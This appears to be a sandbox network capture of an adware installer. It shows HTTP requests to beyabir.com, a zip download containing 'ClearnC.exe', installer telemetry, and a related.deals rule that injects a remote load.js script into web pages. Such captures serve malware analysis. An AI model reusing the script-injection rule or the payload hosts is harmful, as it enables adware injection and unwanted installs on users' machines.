User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 7421

Connection: keep-alive

x-amz-id-2: tb3wzOqbdaXKpKNL10W0GD7quW/G8dQsROYO1ZNZx4BSp/ WOCV6IN Tr7fFpLso

x-amz-request-id: 1A430C7BD6E060DF

x-amz-version-id: fwDsegYHRL0JOsa1HMn_zrCAJNbvgq_T

x-amz-meta-cb-modifiedtime: Tue, 31 Mar 2015 09:00:45 GMT

Last-Modified: Tue, 31 Mar 2015 09:01:01 GMT

ETag: "99901d117a18376c2cf58e46fe682679"

Accept-Ranges: bytes

.PNG........IHDR.......9......K......sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.11G.B7...lIDATx^...X....g.....b..N.5.....5v.5F....X...a..PA.."..XQ)..H...T.....{..C.FE...7...<.gfN.a....sfXN!.....O...E'..d?rW.A.....2.y.."........)m. .wm...!.]....).n.y;g!kb..&.!kr....).....Y3..53...}.=...K. {.jd.j)VWH..%..UC...H......8b......!G..R$v.!n.:!.YClF!....o........@...C...b.B...M!yc.....zS.^.-RG=G.w@....2.L....Z........JbSo).G.$,....-.qWELV.s... ...[......4.r......d.5Qt["/...$..m 6..R..O....1}.sL:...~..o.LH..E..7..[y..".pg.;gpB.k-!.."...".....r.{C.i...*...Px.^.<~...r##..^`.$..z......t......S..]K.0.9..z...?]......J.7."xNX"...*\..L.2..`?PZ./O&c.5C...xa,..W........`]d_...8.\R. ...{...n<.u..........9...ptD.:.m..>..f....j..*........`S7\5...w....$.O~qGn.i......3.v....%d[.B|.R......@[...B.....y$;.....;.).......h...C!....6"..-...c...O...!..(.m0........y.p..J.i..;k.....Y.M/..a.<....g.4.kI...8C.O.".C.1'x.]QGXl.. Y.....<Dc<D.Jy..B8..N..z..*.o....D.:......]O..i@~.kb..VF(.].Y.5.j...k...<l..q.@L.x...Gu.~^..;y.Fh.Wh...#..>...J`....:....(.7...V..,!.........]p.G)..`.l.....d..!s.6./.@.V..Bk.a..."O !..J.h .....<vyH...Af...*.Y...e.......K>"........i.x....8..]Kp..p.fqe[....,;".{#.-.B.....5P..&.H-2O-....f.D...m)..e.R$..pu..%.x.......o|....T..}N'.F.....B.H...M...y..P.K..Y...-...4.;lDaP......X.....c..dW%.{)#.......8H.%...G.Bx.......I6........ .8..p.)p.....D.J..C.?........4..O8.w..`?.(..-.........p.SY..|.lZ.....6V.n.y.^.#......b.8<?.#..G...9.%(....U..4#..D.Z.c.).G.x\-.p....Y..

<<< skipped >>>

GET /img/Rerarapepe/logo_new.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 4569

Connection: keep-alive

x-amz-id-2: i8ICCXz5aRAGTe6TbJWncaksmnn7Nf o0zWa6P1Emvu b2naXV5VqYrZ44fl/JsT

x-amz-request-id: F053A26F739ABFD6

x-amz-meta-s3fox-filesize: 4569

x-amz-meta-s3fox-modifiedtime: 1388397217065

Last-Modified: Mon, 30 Dec 2013 09:53:59 GMT

x-amz-version-id: FBdIFQNqjG8fAIwxlMklzjPUXqz3Asib

ETag: "3263ff057b8e7380f7579d5aaab2bfdc"

Accept-Ranges: bytes

.PNG........IHDR...2...2......?......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2A43320D713811E3B459B11FBD9400CD" xmpMM:DocumentID="xmp.did:2A43320E713811E3B459B11FBD9400CD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2A43320B713811E3B459B11FBD9400CD" stRef:documentID="xmp.did:2A43320C713811E3B459B11FBD9400CD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v.Gr...MIDATx..Z{p\U......$.l.6M.jc..P....T.N.*3.80`...:#.......3>...F..|...3>..hE..(...P-i..y7.$....{.=..w......6)...~.....~..;.PJ.....ur.n.......O|.&...hj&.H.e2$l..y.T*...D.3E.#.A -^t.....TzA-....P.N..i.'.........T..z>.GT.%r........"..H9....R...I......}..@.^../..?o.U...F..c.qA.H.?A.(a.....k....,.!Vb.......:58.K...@z>K[.......S_....T.......... lr......GU..~.....C......t24;f.M.R%...4......`............%..aZ`.... ..@..v...T.L.l9....R.M-0.&0^.`v. u....?Y....e..%.."ik..^....s.}.~.8Iu..?........m...{ix.KM..........,4R..........FF..W@......o.7]p!%Z..f.$k......hB.......DK...R.&..k..%#e.

<<< skipped >>>

GET /img/Rerarapepe/Rerarapepe.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: img.beyabir.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: image/png

Content-Length: 3657

Connection: keep-alive

x-amz-id-2: Z0jI9oUtCmkwjhrm4fpr7I34XCbbJafI4wdwaCXRwxEFhVvEbJ9HB6a84y2LlhS6

x-amz-request-id: 6ABD9C086DAAC9E3

x-amz-meta-s3fox-filesize: 3657

x-amz-meta-s3fox-modifiedtime: 1402226184727

Last-Modified: Mon, 09 Jun 2014 14:19:41 GMT

x-amz-version-id: nXvqG1jeKyMVMqgSg3LnBI1CMsSqJwdV

ETag: "e568d92e622a3ac2f573a98d91df1421"

Accept-Ranges: bytes

.PNG........IHDR.......!.............tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D84B53BEEFE11E39491D45C0DAE79C8" xmpMM:DocumentID="xmp.did:2D84B53CEEFE11E39491D45C0DAE79C8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D84B539EEFE11E39491D45C0DAE79C8" stRef:documentID="xmp.did:2D84B53AEEFE11E39491D45C0DAE79C8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..(.....IDATx..Wi....~U.=....].7.5..l.@..1v...Vb..`..H8.\..D. Q.EA.....Q8..cB.c....&vv}a........3;..]..z...(%..LMu......^3..1"...mr.. ..b...z.B.\.<]!...8...J.~.R.^.U....ArE...q...QW......W.. M..l......R..Dd."...P......F..-.....S...S... .OF...I./.N.&e6.....TW.c....z......@.......`_.X'...X8.3op.'...z&.UT.m...r4:.1.'&.1F....9....Fr&..U...d......<..Z.Q.^.}]X.......D!......73.a.8.....Q..c.w...).^U#..L3..}m......:.z..NN...r.Y..Ck..E}..-....t1..?g..d..t.E:4x.*#....L...(wv..~.OY.......wfO.L.0....4...Ko........h. s6M\.D....$.....W......6g...............>x....<..[...F"5C..=K.....[v...O'..ky

<<< skipped >>>

GET /pki/crl/products/WinPCA.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com

HTTP/1.1 200 OK

Content-Type: application/pkix-crl

Last-Modified: Sat, 07 Mar 2015 06:01:44 GMT

Accept-Ranges: bytes

ETag: "dde36a309c58d01:0"

Server: Microsoft-IIS/8.0

VTag: 43879645100000000

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

Content-Length: 561

Cache-Control: max-age=900

Date: Thu, 30 Apr 2015 23:11:16 GMT

Connection: keep-alive

0..-0......0...*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1 0)..U..."Microsoft Windows Verification PCA..150306223202Z..150605105201Z._0]0...U.#..0.......p............<.J0... .....7.......0...U......40... .....7......150604224201Z0...*.H.............4......n[.t........'....Dx.P3R.!3.|D.6vL.."k..9'....L..k......e.4......._..N..TJ......N.fP...H.....8...TJA...fGA.e...^"{../...H?..E.Y.U....h..0/.......d...6..K..V?QM...{..h.....{.3...v.....\~.7n..5..'..k.Ia.YL..LP.b....._7.V..%......z*$q..Y..f.b..L8<~..v.w....

GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com

HTTP/1.1 200 OK

Content-Type: application/pkix-crl

Last-Modified: Thu, 05 Mar 2015 06:01:35 GMT

Accept-Ranges: bytes

ETag: "cf2633d6957d01:0"

Server: Microsoft-IIS/8.0

VTag: 43853244400000000

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

Content-Length: 550

Cache-Control: max-age=900

Date: Thu, 30 Apr 2015 23:11:16 GMT

Connection: keep-alive

0.."0......0...*.H........0w1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1!0...U....Microsoft Time-Stamp PCA..150304221607Z..150603103607Z._0]0...U.#..0...#4..RFp..@.v.. ..5..0... .....7.......0...U......20... .....7......150602222607Z0...*.H.............Y..}y`....T.Z..`B<..I.N..O... E:....7......a..).........._|W5laoqi(..>t~.."...&`.._.7J...:..{bO_Kyi...R...!...B.s..I.c&j...(I\.S{._;@B...[i.e.[."...R` \...........M^k.=q[.V...9y..G.1o#k3<.W.......H.$>}...U...2qyd2|b.fB.....r....H.P...;....Q...b......5%.P.#..

GET /?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg HTTP/1.1

Host: VVV.google.com.ua

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

HTTP/1.1 302 Found

Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Set-Cookie: PREF=ID=51f9c94f4cfe29d4:FF=0:TM=1430435240:LM=1430435240:S=g94WORl29EpjfH1w; expires=Sat, 29-Apr-2017 23:07:20 GMT; path=/; domain=.google.com.ua

Set-Cookie: NID=67=qdoOTsxHIBtzTljMGdrpSFmRCtEgqqpaqGd7TQCsWjdJn2cW0q0YIqjLKJ0KLzJVLGIWtQmLiygzoNGFC7PcavEgBZ0BXopqy-HiWAZ0-35cuvO-QET6X7KCnu_zeje-; expires=Fri, 30-Oct-2015 23:07:20 GMT; path=/; domain=.google.com.ua; HttpOnly

P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Date: Thu, 30 Apr 2015 23:07:20 GMT

Server: gws

Content-Length: 275

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=1

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl">here</A>...</BODY></HTML>..HTTP/1.1 302 Found..Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl..Cache-Control: private..Content-Type: text/html; charset=UTF-8..Set-Cookie: PREF=ID=51f9c94f4cfe29d4:FF=0:TM=1430435240:LM=1430435240:S=g94WORl29EpjfH1w; expires=Sat, 29-Apr-2017 23:07:20 GMT; path=/; domain=.google.com.ua..Set-Cookie: NID=67=qdoOTsxHIBtzTljMGdrpSFmRCtEgqqpaqGd7TQCsWjdJn2cW0q0YIqjLKJ0KLzJVLGIWtQmLiygzoNGFC7PcavEgBZ0BXopqy-HiWAZ0-35cuvO-QET6X7KCnu_zeje-; expires=Fri, 30-Oct-2015 23:07:20 GMT; path=/; domain=.google.com.ua; HttpOnly..P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."..Date: Thu, 30 Apr 2015 23:07:20 GMT..Server: gws..Content-Length: 275..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:quic,p=1..<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl">here</A>...</BOD

<<< skipped >>>

HEAD /ofr/isicicc2.7.cis HTTP/1.1

Accept: */*

Host: cdneu.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: application/x-unknown-content-type

Content-Length: 385602

Connection: keep-alive

x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=

x-amz-request-id: 2863C8C2B1E22044

x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM

x-amz-meta-s3fox-modifiedtime: 1424088160999

x-amz-meta-s3fox-filesize: 385602

Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT

ETag: "83fc375cf199ed35bd27a27f506b831f"

Accept-Ranges: bytes

HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:08 GMT..Content-Type: application/x-unknown-content-type..Content-Length: 385602..Connection: keep-alive..x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=..x-amz-request-id: 2863C8C2B1E22044..x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM..x-amz-meta-s3fox-modifiedtime: 1424088160999..x-amz-meta-s3fox-filesize: 385602..Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT..ETag: "83fc375cf199ed35bd27a27f506b831f"..Accept-Ranges: bytes..HTTP/1.1 206 Partial Content..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:10 GMT..Content-Type: application/x-unknown-content-type..Content-Length: 180802..Connection: keep-alive..x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=..x-amz-request-id: 2863C8C2B1E22044..x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM..x-amz-meta-s3fox-modifiedtime: 1424088160999..x-amz-meta-s3fox-filesize: 385602..Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT..ETag: "83fc375cf199ed35bd27a27f506b831f"..Content-Range: bytes 204800-385601/385602.. .(.....Y_...u9.o....)...d..Q.........n.....W.~..D...A..^........$ t../....<..$..H..Md^#......m....-.z{..B?$...K.n:hL......'..%....E..;..e..H.U........M..2.R}......H......#...U!.`.C..m._.........n.....E...^.......-54. ..I.Y...tRQ....o?.....H..@|h.......&... F..."........L....Q.gn.1....!..LS..............:.Q.)n...%..Cn2.d..N.....Z.;.L..]..gy..if,.D4=..=....;,].>....Ln...O..1......4.H...g/3.;P..Edh..'<l....2

<<< skipped >>>

GET /ofr/isicicc2.7.cis HTTP/1.1

Range: bytes=102400-204799

Accept: */*

Host: cdneu.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Connection: Keep-Alive

<<< skipped >>>

GET /3517/2 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.ejpkwz.cc

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 01 May 2015 01:05:37 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.2.14p1

Location: hXXp://VVV.ejpkwz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip

0......

GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.ejpkwz.cc

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 01 May 2015 01:05:38 GMT

Content-Type: application/zip

Content-Length: 3016484

Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT

Connection: keep-alive

Accept-Ranges: bytes

PK........}*.F.4.k5...0.......479.db.0...!..........<..A#.U......L........* ...i.AU%......k.1...o4...MX*.8.D.].J.. ..f.q.oV.Q7..c..%!u..>..2.He.}.tod.Z..^B...ru-2(.........`h`.}...|g*..g...R.gcsw(.xa..x.v.C.]O $.".........3......4.........b...1Y8E. L........v.n..3.^B...ru-w.......c^.0......q|.".2.l..........iU.Z.....K.|..F.1...........Hov43E3fPK.........).F.U..............ClearnC.exe...`...8.?.#..6......HP4.....4.l.J`C`C.I@....1y..J ..j..U.j..W.\lK[o..U.Vt..$(..\.B...N.Tc.. .y.9..f....}.......=...9sf...33...-..A0.QUA8$......u..u..F......C......bC...z....6.....i.h{..V-m.m.d.Z.o.........T-....:.\....i....7.|....>........uP...........M..[;.'................!u.M..........~...n.....F.k.v. ..:..C....".....a#0......P...N..]...:.......e..m....}w.....".I......r..l......u.:H.!........|3n....g.O=....Bwe..m.5....:^g.........*7C...r..Y.._.n....._.[..x...C.P.....3cO.>S......w....s.{.K..r..pU.^.).sO.:.......PG*.9O..&A..*..\.V'Q....&...`9..H.[.'b4.bk./NY.......gW.x.!.y.r...4.t.Sr......V_Ab..X..S>..jN..I..h.. s<:.KM2B>J...4J...I.|v..B..=......$3.A9R..*....H......jR...=dP.c...H..H..n.m......~4dS..g.1t......N...!.o.r.O\.[..b...n5...5....~.E.. ...>.^".1S.HU:.~|.|.mTZ..s...L...x...k.#...._....?h.......i..7.>..t................R..=.......b]..z...W...h!.'.O.U.....Mk....=\...CN....~ .5)...~..Gg.0.x...........8>.!*....N.y..O..j%0.......Vh{.l..O..... `..RM..t.P..6....u.......;...r.0\j...`2F.CC..... ..E.......9......ao .GL......<br.j..Y....N.e..,?Jt;I.I..W~A.V._...Gl..q;&..M=.5....M./.<...)&...W.>..

<<< skipped >>>

GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:56 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=120183, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 22:20:25 GMT

Expires: Sat, 02 May 2015 10:20:25 GMT

ETag: "d08b003f15d07cc5bfc23c2479efc8bedd8da485"

Content-Length: 1788

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430222025Z0l0j0B0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,......E..........20150430222025Z....20150502102025Z0...*.H..............\.{...I...8P.q]..q6.a_.n#.......4.)Y.vn.3..tV..%ZYn..(.?.....@X\..).XeA/. ..v..7.~...R..c.F. ..........!...nI.=`...C..v......A...H..S.x..........4.AEw,..1.....!=..U&...t......Ii..A..p)....N0{..Z..L...M>t...m......^...y.....^*.E..2NG..p.>NH.H.....6.j....z.....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H...........

<<< skipped >>>

GET /services/stores?dummy=593 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.related.deals

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:22 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

P3P: CP="Potato"

X-Cache: MISS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

Content-Encoding: gzip

14b............mRAr. ...1.'.8.[..6.v_.%-....#....R..r[.Q'D.{..z.....Q...U..8..\...I.MN!.-.... .H@.Md.<z[...:cg\....Y.lh..l...{%../H.|..aT..l...;?-...k..UO.BMw)C.f..*..Q..bu.!.I.5...!.....y.HY.......... H.7..2.NX)g..$lxp....A..J/D..R..$...0...J.!R.K.D~.D.l.V..E.v4..-..P$.....R.BE...<.(*..;.....5..e.......8........9.g......O..4_].he......0......

GET /services/rules?dummy=865 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.related.deals

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:22 GMT

Content-Type: text/plain

Content-Length: 265

Connection: keep-alive

Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT

ETag: "5d60ef-109-50e71dec37cc0"

Cache-Control: max-age=600

Expires: Thu, 30 Apr 2015 23:17:22 GMT

P3P: CP="Potato"

X-Cache: MISS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

Accept-Ranges: bytes

</body>|<script>var cb_instID='{instID}';cbS=document.createElement("script");cbS.setAttribute("type","text/javascript");cbS.setAttribute("src", "hXXp://related.deals/services/load.js");document.body.appendChild(cbS);</script></body>.{cashReminder_instID}|{instID}.....

GET /services/update/1.0.0/Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea/677 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.related.deals

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:22 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

P3P: CP="Potato"

X-Cache: BYPASS

X-Server: Provided by Intermedia

X-Country: UA

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:22 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: UA..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ds HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:20 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:20 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0......

GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.finish HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:25 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

4a..{"stats":"ok","time":"262.11 ms","message":"store 1 action and 0 update "}..0..

POST /YBRInternet/?v=5.0&c=1840466908 HTTP/1.1

Accept: */*

Host: os.beyabir.com

User-Agent: ICAS

Content-Length: 1404

Cache-Control: no-cache

